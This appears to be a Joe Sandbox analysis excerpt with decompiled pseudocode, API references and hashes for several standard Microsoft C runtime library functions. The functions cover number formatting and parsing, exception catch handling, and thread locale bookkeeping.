			E00442342(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t227;
				intOrPtr _t228;
				signed short _t233;
				intOrPtr _t238;
				signed int _t244;
				char* _t245;
				void* _t249;
				signed int _t251;
				void* _t253;
				void* _t254;
				signed int* _t256;
				signed int* _t258;
				signed int* _t269;
				signed int* _t271;
				signed int* _t273;
				signed int _t275;
				signed int* _t280;
				signed int* _t282;
				signed short _t285;
				signed int* _t290;
				signed int _t292;
				signed int* _t294;
				signed int* _t297;
				char* _t299;
				signed int _t301;
				signed int _t304;
				signed int _t305;
				intOrPtr _t309;
				signed int _t311;
				signed int _t313;
				char* _t315;
				intOrPtr _t320;
				void* _t336;
				signed int _t348;
				intOrPtr* _t363;
				intOrPtr* _t365;
				void* _t366;
				void* _t367;
				void* _t368;
				void* _t369;
				void* _t370;
				void* _t371;
				void* _t373;
				void* _t375;
				intOrPtr _t391;

				_t375 = __eflags;
				E00425719(E0044F908, __ebx, __edi, __esi);
				_t320 =  *((intOrPtr*)(_t366 + 0x18));
				_t361 =  *((intOrPtr*)(_t366 + 8));
				_t363 =  *((intOrPtr*)(_t366 + 0x20));
				 *((intOrPtr*)(_t366 - 0x8c)) =  *((intOrPtr*)(_t366 + 0xc));
				 *(_t366 - 0x7c) =  *(_t366 + 0x1c) & 0x0000ffff;
				 *(_t366 - 0x5c) =  *(_t366 + 0x24);
				 *(_t366 - 0x74) =  *(_t366 + 0x28);
				 *(_t366 - 0x54) =  *(_t366 + 0x2c);
				 *(_t366 - 0x50) =  *(_t366 + 0x30);
				_t227 = E004013A0(_t366 - 0x68);
				 *(_t366 - 4) =  *(_t366 - 4) & 0x00000000;
				_t228 = E0043D800(_t320, __edx,  *((intOrPtr*)(_t366 + 8)), _t363, _t375);
				 *(_t366 - 4) =  *(_t366 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t366 - 0x78)) = _t228;
				E004012D0();
				E0043E9B7( *((intOrPtr*)(_t366 - 0x78)), _t366 - 0x48);
				 *(_t366 - 4) = 1;
				_t233 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t366 - 0x78)))) + 8))(_t227, 0x80);
				 *(_t366 - 0x1c) =  *(_t366 - 0x1c) & 0x00000000;
				 *(_t366 - 0x80) = _t233 & 0x0000ffff;
				 *((intOrPtr*)(_t366 - 0x18)) = 0xf;
				 *((char*)(_t366 - 0x2c)) = 0;
				 *(_t366 - 4) = 2;
				 *(_t366 - 0x70) = E0043B943( *((intOrPtr*)(_t366 - 0x78)), 0x30, 0,  *((intOrPtr*)(_t366 + 8)) + 8) & 0x0000ffff;
				_t238 =  *_t363;
				_t368 = _t367 + 0xc;
				if(_t238 == 0x2b) {
					L3:
					 *(_t366 - 0x84) = 1;
					L4:
					 *((char*)(_t366 - 0x58)) =  *((intOrPtr*)( *((intOrPtr*)(E004230FE(_t320, _t361, _t363, _t377)))));
					 *((short*)(_t366 - 0x57)) = 0x65;
					 *(_t366 - 0x4c) = E00423130(_t363, 0x65,  *(_t366 - 0x50));
					_t244 = E00423130(_t363,  *((char*)(_t366 - 0x58)),  *(_t366 - 0x50));
					_t369 = _t368 + 0x18;
					 *(_t366 - 0x60) = _t244;
					if(_t244 == 0) {
						 *(_t366 - 0x54) =  *(_t366 - 0x54) & _t244;
					}
					_t245 =  *((intOrPtr*)(_t366 - 0x48));
					if( *((intOrPtr*)(_t366 - 0x34)) < 0x10) {
						_t245 = _t366 - 0x48;
					}
					if( *_t245 == 0x7f) {
						L33:
						_t326 =  *(_t320 + 0x20);
						_t249 =  *(_t366 - 0x50) +  *(_t366 - 0x54) +  *(_t366 - 0x74) +  *(_t366 - 0x5c);
						_t391 =  *((intOrPtr*)(_t320 + 0x24));
						if(_t391 < 0 || _t391 <= 0 && _t326 <= 0 || _t326 <= _t249) {
							 *(_t366 - 0x4c) = 0;
						} else {
							 *(_t366 - 0x4c) = _t326;
						}
						_t251 =  *(_t320 + 0x14) & 0x000001c0;
						if(_t251 != 0x40) {
							if(_t251 == 0x100 &&  *(_t366 - 0x84) > 0) {
								_t297 = E0043C5AD(_t326, _t361, _t366 - 0x64,  *(_t366 + 0x10),  *(_t366 + 0x14), _t363, 1);
								_t369 = _t369 + 0x18;
								 *(_t366 + 0x10) =  *_t297;
								_t363 = _t363 + 1;
								 *(_t366 - 0x50) =  *(_t366 - 0x50) - 1;
								 *(_t366 + 0x14) = _t297[1];
							}
							_t294 = E0043D357(_t361, _t366 - 0x64,  *(_t366 + 0x10),  *(_t366 + 0x14),  *(_t366 - 0x7c),  *(_t366 - 0x4c));
							_t326 =  *_t294;
							 *(_t366 + 0x10) =  *_t294;
							_t369 = _t369 + 0x18;
							 *(_t366 - 0x4c) =  *(_t366 - 0x4c) & 0x00000000;
							 *(_t366 + 0x14) = _t294[1];
						}
						_t253 = E00423130(_t363,  *((char*)(_t366 - 0x58)),  *(_t366 - 0x50));
						_t370 = _t369 + 0xc;
						if(_t253 != 0) {
							 *(_t366 - 0x60) = _t253 - _t363 + 1;
							_t280 = E0043D38C(_t326, _t361, _t366 - 0x88,  *(_t366 + 0x10),  *(_t366 + 0x14), _t363, _t253 - _t363 + 1 - 1,  *(_t366 - 0x80));
							 *(_t366 + 0x10) =  *_t280;
							 *(_t366 + 0x14) = _t280[1];
							_t282 = E0043D357(_t361, _t366 - 0x88,  *_t280, _t280[1],  *(_t366 - 0x70),  *(_t366 - 0x5c));
							 *(_t366 + 0x10) =  *_t282;
							 *(_t366 + 0x14) = _t282[1];
							_t285 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t366 - 0x78)))) + 4))();
							 *(_t366 - 0x6c) =  *(_t366 + 0x10);
							 *(_t366 - 0x68) =  *(_t366 + 0x14);
							E0043C582(_t366 - 0x6c, _t285 & 0x0000ffff);
							 *(_t366 + 0x10) =  *(_t366 - 0x6c);
							 *(_t366 + 0x14) =  *(_t366 - 0x68);
							_t290 = E0043D357(_t361, _t366 - 0x6c,  *(_t366 - 0x6c),  *(_t366 - 0x68),  *(_t366 - 0x70),  *(_t366 - 0x74));
							_t326 =  *_t290;
							 *(_t366 + 0x10) =  *_t290;
							 *(_t366 + 0x14) = _t290[1];
							_t292 =  *(_t366 - 0x60);
							_t370 = _t370 + 0x4c;
							_t363 = _t363 + _t292;
							 *(_t366 - 0x50) =  *(_t366 - 0x50) - _t292;
						}
						_t254 = E00423130(_t363, 0x65,  *(_t366 - 0x50));
						_t371 = _t370 + 0xc;
						if(_t254 != 0) {
							 *(_t366 - 0x68) = _t254 - _t363 + 1;
							_t269 = E0043D38C(_t326, _t361, _t366 - 0x64,  *(_t366 + 0x10),  *(_t366 + 0x14), _t363, _t254 - _t363 + 1 - 1,  *(_t366 - 0x80));
							 *(_t366 + 0x10) =  *_t269;
							 *(_t366 + 0x14) = _t269[1];
							_t271 = E0043D357(_t361, _t366 - 0x64,  *_t269, _t269[1],  *(_t366 - 0x70),  *(_t366 - 0x54));
							 *(_t366 - 0x54) =  *(_t366 - 0x54) & 0x00000000;
							 *(_t366 + 0x10) =  *_t271;
							_t373 = _t371 + 0x34;
							 *(_t366 + 0x14) = _t271[1];
							_t336 = 0x45163c;
							if(( *(_t320 + 0x14) & 0x00000004) == 0) {
								_t336 = 0x451638;
							}
							_t273 = E0043C5AD(_t336, _t361, _t366 - 0x64,  *_t271, _t271[1], _t336, 1);
							_t326 =  *_t273;
							 *(_t366 + 0x10) =  *_t273;
							 *(_t366 + 0x14) = _t273[1];
							_t275 =  *(_t366 - 0x68);
							_t371 = _t373 + 0x18;
							_t363 = _t363 + _t275;
							 *(_t366 - 0x50) =  *(_t366 - 0x50) - _t275;
						}
						_t256 = E0043D38C(_t326, _t361, _t366 - 0x6c,  *(_t366 + 0x10),  *(_t366 + 0x14), _t363,  *(_t366 - 0x50),  *(_t366 - 0x80));
						 *(_t366 + 0x10) =  *_t256;
						 *(_t366 + 0x14) = _t256[1];
						_t258 = E0043D357(_t361, _t366 - 0x64,  *_t256, _t256[1],  *(_t366 - 0x70),  *(_t366 - 0x54));
						 *(_t366 + 0x10) =  *_t258;
						 *(_t366 + 0x14) = _t258[1];
						 *(_t320 + 0x20) = 0;
						 *((intOrPtr*)(_t320 + 0x24)) = 0;
						E0043D357(_t361,  *((intOrPtr*)(_t366 - 0x8c)),  *_t258, _t258[1],  *(_t366 - 0x7c),  *(_t366 - 0x4c));
						E00402E20(_t366 - 0x2c, 1, 0);
						E00402E20(_t366 - 0x48, 1, 0);
						return E00425763(_t320, _t361, 0);
					} else {
						_t299 =  *((intOrPtr*)(_t366 - 0x48));
						if( *((intOrPtr*)(_t366 - 0x34)) < 0x10) {
							_t299 = _t366 - 0x48;
						}
						if( *_t299 > 0) {
							E00403F40(_t366 - 0x2c, _t363,  *(_t366 - 0x50));
							_t301 =  *(_t366 - 0x4c);
							if(_t301 != 0) {
								__eflags =  *(_t366 - 0x60);
								if( *(_t366 - 0x60) == 0) {
									E00403B10(_t366 - 0x2c,  *(_t366 - 0x5c), 0x30);
									_t62 = _t366 - 0x5c;
									 *_t62 =  *(_t366 - 0x5c) & 0x00000000;
									__eflags =  *_t62;
									_t301 =  *(_t366 - 0x4c);
								}
								__eflags = _t301 - _t363;
								E00404060(_t366 - 0x2c, _t301 - _t363,  *(_t366 - 0x54), 0x30);
							} else {
								E00403B10(_t366 - 0x2c,  *(_t366 - 0x54), 0x30);
							}
							_t304 =  *(_t366 - 0x60);
							_push(0x30);
							_t348 = _t366 - 0x2c;
							if(_t304 != 0) {
								_push( *(_t366 - 0x74));
								_t305 = _t304 - _t363;
								 *(_t366 - 0x60) = _t305;
								_push(_t305 + 1);
								E00404060(_t348);
								E00404060(_t366 - 0x2c,  *(_t366 - 0x60),  *(_t366 - 0x5c), 0x30);
								_t75 = _t366 - 0x74;
								 *_t75 =  *(_t366 - 0x74) & 0x00000000;
								__eflags =  *_t75;
							} else {
								_push( *(_t366 - 0x5c));
								E00403B10(_t348);
							}
							 *(_t366 - 0x5c) =  *(_t366 - 0x5c) & 0x00000000;
							_t365 =  *((intOrPtr*)(_t366 - 0x48));
							if( *((intOrPtr*)(_t366 - 0x34)) < 0x10) {
								_t365 = _t366 - 0x48;
							}
							_t309 =  *((intOrPtr*)(_t366 - 0x2c));
							if( *((intOrPtr*)(_t366 - 0x18)) < 0x10) {
								_t309 = _t366 - 0x2c;
							}
							 *(_t366 - 0x4c) = E004231E0(_t366 - 0x58, _t309, _t366 - 0x58);
							while(1) {
								_t311 =  *_t365;
								if(_t311 == 0x7f) {
									break;
								}
								__eflags = _t311;
								if(_t311 <= 0) {
									break;
								}
								_t313 = _t311;
								__eflags = _t313 -  *(_t366 - 0x4c) -  *(_t366 - 0x84);
								if(_t313 >=  *(_t366 - 0x4c) -  *(_t366 - 0x84)) {
									break;
								}
								 *(_t366 - 0x4c) =  *(_t366 - 0x4c) - _t313;
								E00404060(_t366 - 0x2c,  *(_t366 - 0x4c), 1, 0);
								_t315 = _t365 + 1;
								__eflags =  *_t315;
								if( *_t315 > 0) {
									_t365 = _t315;
								}
							}
							_t363 =  *((intOrPtr*)(_t366 - 0x2c));
							if( *((intOrPtr*)(_t366 - 0x18)) < 0x10) {
								_t363 = _t366 - 0x2c;
							}
							 *(_t366 - 0x54) =  *(_t366 - 0x54) & 0x00000000;
							 *(_t366 - 0x50) =  *(_t366 - 0x1c);
						}
						goto L33;
					}
				}
				_t377 = _t238 - 0x2d;
				if(_t238 == 0x2d) {
					goto L3;
				}
				 *(_t366 - 0x84) =  *(_t366 - 0x84) & 0x00000000;
				goto L4;
			}

0x00442342
0x0044234c
0x00442354
0x00442357
0x0044235a
0x0044235d
0x00442367
0x0044236d
0x00442373
0x00442379
0x0044237f
0x00442388
0x0044238d
0x00442392
0x00442397
0x0044239f
0x004423a2
0x004423ae
0x004423b8
0x004423bf
0x004423c2
0x004423c9
0x004423cc
0x004423d3
0x004423df
0x004423eb
0x004423ee
0x004423f0
0x004423f5
0x00442404
0x00442404
0x0044240e
0x0044241d
0x00442420
0x0044242e
0x00442437
0x0044243c
0x0044243f
0x00442444
0x00442446
0x00442446
0x0044244d
0x00442450
0x00442452
0x00442452
0x00442458
0x00442571
0x00442577
0x0044257f
0x00442582
0x00442585
0x00442598
0x00442591
0x00442593
0x00442593
0x0044259e
0x004425a6
0x004425ad
0x004425c5
0x004425cc
0x004425cf
0x004425d5
0x004425d6
0x004425d9
0x004425d9
0x004425ed
0x004425f2
0x004425f4
0x004425fa
0x004425fd
0x00442601
0x00442601
0x0044260d
0x00442612
0x00442617
0x00442623
0x00442637
0x00442641
0x0044264a
0x0044265a
0x00442661
0x0044266a
0x00442672
0x00442678
0x00442681
0x00442688
0x0044269b
0x004426a3
0x004426a6
0x004426ab
0x004426ad
0x004426b3
0x004426b6
0x004426b9
0x004426bc
0x004426be
0x004426be
0x004426c7
0x004426cc
0x004426d1
0x004426dd
0x004426ee
0x004426f8
0x00442701
0x0044270e
0x00442715
0x00442719
0x0044271f
0x00442726
0x00442729
0x0044272e
0x00442730
0x00442730
0x00442742
0x00442747
0x00442749
0x0044274f
0x00442752
0x00442755
0x00442758
0x0044275a
0x0044275a
0x0044276f
0x00442779
0x00442782
0x0044278f
0x00442799
0x004427ac
0x004427b0
0x004427b3
0x004427b6
0x004427c4
0x004427cf
0x004427df
0x0044245e
0x00442462
0x00442465
0x00442467
0x00442467
0x0044246d
0x0044247a
0x0044247f
0x00442484
0x00442495
0x00442499
0x004424a3
0x004424a8
0x004424a8
0x004424a8
0x004424ac
0x004424ac
0x004424b4
0x004424ba
0x00442486
0x0044248e
0x0044248e
0x004424bf
0x004424c2
0x004424c4
0x004424c9
0x004424d5
0x004424d8
0x004424da
0x004424de
0x004424df
0x004424ef
0x004424f4
0x004424f4
0x004424f4
0x004424cb
0x004424cb
0x004424ce
0x004424ce
0x004424f8
0x00442500
0x00442503
0x00442505
0x00442505
0x0044250c
0x0044250f
0x00442511
0x00442511
0x00442520
0x00442555
0x00442555
0x00442559
0x00000000
0x00000000
0x00442525
0x00442527
0x00000000
0x00000000
0x00442532
0x00442535
0x00442537
0x00000000
0x00000000
0x00442539
0x00442546
0x0044254b
0x0044254e
0x00442551
0x00442553
0x00442553
0x00442551
0x0044255f
0x00442562
0x00442564
0x00442564
0x0044256a
0x0044256e
0x0044256e
0x00000000
0x0044246d
0x00442458
0x004423f7
0x004423f9
0x00000000
0x00000000
0x004423fb
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 0044234C

Part of subcall function 004013A0: std::_Lockit::_Lockit.LIBCPMT ref: 004013BC

Part of subcall function 0043D800: __EH_prolog3.LIBCMT ref: 0043D807
Part of subcall function 0043D800: std::_Lockit::_Lockit.LIBCPMT ref: 0043D811

Part of subcall function 004012D0: std::_Lockit::_Lockit.LIBCPMT ref: 004012DE

_Maklocchr.LIBCPMT ref: 004423E3
_localeconv.LIBCMT ref: 0044240E
_strcspn.LIBCMT ref: 00442519

Strings

e, xrefs: 00442420

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$H_prolog3H_prolog3_Maklocchr_localeconv_strcspn
String ID: e
API String ID: 3350728577-4024072794
Opcode ID: 039db8d22d31bc50cbcbea2915725b01e11b9045a9b7bdd8dd53a0bb1196fb3a
Instruction ID: 67fccad85a3288fdc83bfc842cea8e1c81c244a1b1779d12672a51e820538683
Opcode Fuzzy Hash: 039db8d22d31bc50cbcbea2915725b01e11b9045a9b7bdd8dd53a0bb1196fb3a
Instruction Fuzzy Hash: 50026670D00219AFEF15DFA8C984AEEBBB5FF08304F04806AF815AB252D7799A51CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00426A9C Relevance: 9.0, APIs: 6, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00426A9C(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				void* _t53;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_push(0x2c);
				_push(0x45bdb8);
				E0042A1F0(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E00422FEA(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00427FEA(_t53, _t55, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00427FEA(_t53, _t55, _t61) + 0x8c));
				 *((intOrPtr*)(E00427FEA(_t53, _t55, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E00427FEA(_t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E0042308F(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E00426BC2(_t48, _t53, _t55, _t57, _t61);
				return E0042A235( *((intOrPtr*)(_t58 - 0x1c)));
			}

0x00426a9c
0x00426a9c
0x00426a9e
0x00426aa3
0x00426aa8
0x00426aaa
0x00426aad
0x00426ab0
0x00426ab3
0x00426aba
0x00426acb
0x00426ad9
0x00426ae7
0x00426aef
0x00426afd
0x00426b03
0x00426b0a
0x00426b0d
0x00426b23
0x00426b26
0x00426b9b
0x00426ba2
0x00426ba9
0x00426bb6

APIs

__CreateFrameInfo.LIBCMT ref: 00426AC4

Part of subcall function 00422FEA: __getptd.LIBCMT ref: 00422FF8
Part of subcall function 00422FEA: __getptd.LIBCMT ref: 00423006

__getptd.LIBCMT ref: 00426ACE

Part of subcall function 00427FEA: __getptd_noexit.LIBCMT ref: 00427FED
Part of subcall function 00427FEA: __amsg_exit.LIBCMT ref: 00427FFA

__getptd.LIBCMT ref: 00426ADC
__getptd.LIBCMT ref: 00426AEA
__getptd.LIBCMT ref: 00426AF5
_CallCatchBlock2.LIBCMT ref: 00426B1B

Part of subcall function 0042308F: __CallSettingFrame@12.LIBCMT ref: 004230DB

Part of subcall function 00426BC2: __getptd.LIBCMT ref: 00426BD1
Part of subcall function 00426BC2: __getptd.LIBCMT ref: 00426BDF

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 57df4fa5eaf59d945ee4cd6de0e1a6c3154f6029b1acc38023a6cf5a04ae7d85
Instruction ID: e25748d2f8f5b84492e07b9ba2f5058ba1a0e000842e6b6407a754243957a2bf
Opcode Fuzzy Hash: 57df4fa5eaf59d945ee4cd6de0e1a6c3154f6029b1acc38023a6cf5a04ae7d85
Instruction Fuzzy Hash: 4F114470E04319DFCB00EFA5E945AADBBB0FF04318F51806AF814A7252EB389A11DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00429955 Relevance: 9.0, APIs: 6, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 92%

			E00429955(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x45bf88);
				E0042A1F0(__ebx, __edi, __esi);
				_t31 = E00427FEA(__edx, __edi, _t35);
				_t15 =  *0x460dd0; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0042BD94(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x461480; // 0x2231600
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x461058;
								if(__eflags != 0) {
									E00422BFA(_t33);
								}
							}
						}
						_t21 =  *0x461480; // 0x2231600
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x461480; // 0x2231600
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E004299F0();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E0042A1CE(_t25, _t29, _t31, _t33, _t38, 0x20);
				}
				return E0042A235(_t33);
			}

0x00429955
0x00429955
0x00429955
0x00429955
0x00429957
0x0042995c
0x00429966
0x00429968
0x00429970
0x00429991
0x00429997
0x0042999b
0x0042999e
0x004299a1
0x004299a7
0x004299a9
0x004299ab
0x004299b4
0x004299b6
0x004299b8
0x004299be
0x004299c1
0x004299c6
0x004299be
0x004299b6
0x004299c7
0x004299cc
0x004299cf
0x004299d5
0x004299d9
0x004299d9
0x004299df
0x004299e6
0x00429978
0x00429978
0x00429978
0x0042997b
0x0042997d
0x00429981
0x00429986
0x0042998e

APIs

__getptd.LIBCMT ref: 00429961

Part of subcall function 00427FEA: __getptd_noexit.LIBCMT ref: 00427FED
Part of subcall function 00427FEA: __amsg_exit.LIBCMT ref: 00427FFA

__amsg_exit.LIBCMT ref: 00429981
__lock.LIBCMT ref: 00429991
InterlockedDecrement.KERNEL32(?), ref: 004299AE
_free.LIBCMT ref: 004299C1
InterlockedIncrement.KERNEL32(02231600), ref: 004299D9

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: f7f51b66a43734d3b6bbef48d4788652a85f3196d5879e676409c907e0eb68d7
Instruction ID: 9b88331c153a879ca2bb57fff7cd9547f20b40715d0d82fb0931c616051e184e
Opcode Fuzzy Hash: f7f51b66a43734d3b6bbef48d4788652a85f3196d5879e676409c907e0eb68d7
Instruction Fuzzy Hash: AD018EB1B016319BCB10AB65A80576EB760BF04724F84011FF804A3391DB7CAC81CBDE

Uniqueness

Uniqueness Score: -1.00%

Function 0043E778 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 169
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0043E778(intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24) {
				signed int _v8;
				char _v9;
				char _v39;
				char _v40;
				char _v41;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				intOrPtr* _v64;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t54;
				signed short _t56;
				void* _t58;
				void* _t86;
				void* _t88;
				char* _t92;
				intOrPtr _t93;
				intOrPtr _t111;
				signed int _t115;
				intOrPtr _t116;
				signed int _t117;
				void* _t118;
				void* _t119;

				_t111 = __edx;
				_t54 =  *0x4608e0; // 0xb51ec2b3
				_v8 = _t54 ^ _t117;
				_t116 = _a8;
				_t113 = _a4 + 0x14;
				_v52 = _a12;
				_v64 = _a24;
				_t56 = E0043B943(_a24, 0x30, 0, _a4 + 0x14);
				_t119 = _t118 + 0xc;
				_t96 = _t116;
				_v48 = _t56 & 0x0000ffff;
				_t92 =  &_v40;
				_t58 = E0043C897(_t116, _v52);
				if(_t58 != 0) {
					L10:
					_t114 = _v52;
					_v41 = 0;
					if(E0043C897(_t116, _v52) != 0) {
						L28:
						while(E0043C897(_t116, _t114) == 0) {
							if( *((char*)(_t116 + 4)) == 0) {
								E0043C83E(_t116);
							}
							if(_v48 >  *(_t116 + 6)) {
								break;
							} else {
								if( *((char*)(_t116 + 4)) == 0) {
									E0043C83E(_t116);
								}
								if(( *(_t116 + 6) & 0x0000ffff) > (_v48 & 0x0000ffff) + 9) {
									break;
								} else {
									if( *((char*)(_t116 + 4)) == 0) {
										E0043C83E(_t116);
									}
									 *_t92 =  *(_t116 + 6) - _v48 + 0x30;
									if(_t92 <  &_v9) {
										_t92 = _t92 + 1;
									}
									_v41 = 1;
									E0043C86E(_t116);
									continue;
								}
							}
						}
						if(_v41 == 0) {
							_t92 =  &_v40;
						}
						_t115 = 0;
						 *_t92 = 0;
						_v60 = 0;
						_t93 = E0044BBF6( &_v40,  &_v68, 0xa,  &_v60);
						if(E0043C897(_t116, _v52) != 0) {
							_t115 = 1;
						}
						if(_v68 ==  &_v40 || _v60 != 0 || _t93 < _a16 || _a20 < _t93) {
							_t115 = _t115 | 0x00000002;
						} else {
							 *_v64 = _t93;
						}
						return E004230EF(_t115, _t93, _v8 ^ _t117, _t111, _t115, _t116);
					}
					L11:
					L11:
					if( *((char*)(_t116 + 4)) == 0) {
						E0043C83E(_t116);
					}
					if( *(_t116 + 6) != _v48) {
						goto L15;
					}
					_v41 = 1;
					E0043C86E(_t116);
					if(E0043C897(_t116, _t114) == 0) {
						goto L11;
					}
					L15:
					if(_v41 != 0) {
						 *_t92 = 0x30;
						_t92 = _t92 + 1;
					}
					goto L28;
				}
				if( *((intOrPtr*)(_t116 + 4)) == _t58) {
					_t96 = _t116;
					E0043C83E(_t116);
				}
				_v56 =  *(_t116 + 6) & 0x0000ffff;
				_t86 = E0043B943(_t96, 0x2b, 0, _t113);
				_t119 = _t119 + 0xc;
				if(_v56 != _t86) {
					if( *((char*)(_t116 + 4)) == 0) {
						_t96 = _t116;
						E0043C83E(_t116);
					}
					_v56 =  *(_t116 + 6) & 0x0000ffff;
					_t88 = E0043B943(_t96, 0x2d, 0, _t113);
					_t119 = _t119 + 0xc;
					if(_v56 != _t88) {
						goto L10;
					} else {
						_v40 = 0x2d;
						goto L9;
					}
				} else {
					_v40 = 0x2b;
					L9:
					_t92 =  &_v39;
					E0043C86E(_t116);
					goto L10;
				}
			}

0x0043e778
0x0043e780
0x0043e787
0x0043e78f
0x0043e796
0x0043e79a
0x0043e7a4
0x0043e7a7
0x0043e7ac
0x0043e7b5
0x0043e7b7
0x0043e7ba
0x0043e7bd
0x0043e7c4
0x0043e827
0x0043e827
0x0043e82d
0x0043e838
0x00000000
0x0043e8d5
0x0043e87c
0x0043e880
0x0043e880
0x0043e88d
0x00000000
0x0043e88f
0x0043e893
0x0043e897
0x0043e897
0x0043e8a9
0x00000000
0x0043e8ab
0x0043e8af
0x0043e8b3
0x0043e8b3
0x0043e8c0
0x0043e8c7
0x0043e8c9
0x0043e8c9
0x0043e8cc
0x0043e8d0
0x00000000
0x0043e8d0
0x0043e8a9
0x0043e88d
0x0043e8e5
0x0043e8e7
0x0043e8e7
0x0043e8f7
0x0043e8fa
0x0043e8fd
0x0043e90d
0x0043e916
0x0043e918
0x0043e918
0x0043e91f
0x0043e938
0x0043e931
0x0043e934
0x0043e934
0x0043e94b
0x0043e94b
0x00000000
0x0043e83e
0x0043e842
0x0043e846
0x0043e846
0x0043e853
0x00000000
0x00000000
0x0043e857
0x0043e85b
0x0043e86a
0x00000000
0x00000000
0x0043e86c
0x0043e870
0x0043e872
0x0043e875
0x0043e875
0x00000000
0x0043e870
0x0043e7c9
0x0043e7cb
0x0043e7cd
0x0043e7cd
0x0043e7db
0x0043e7de
0x0043e7e3
0x0043e7ea
0x0043e7f6
0x0043e7f8
0x0043e7fa
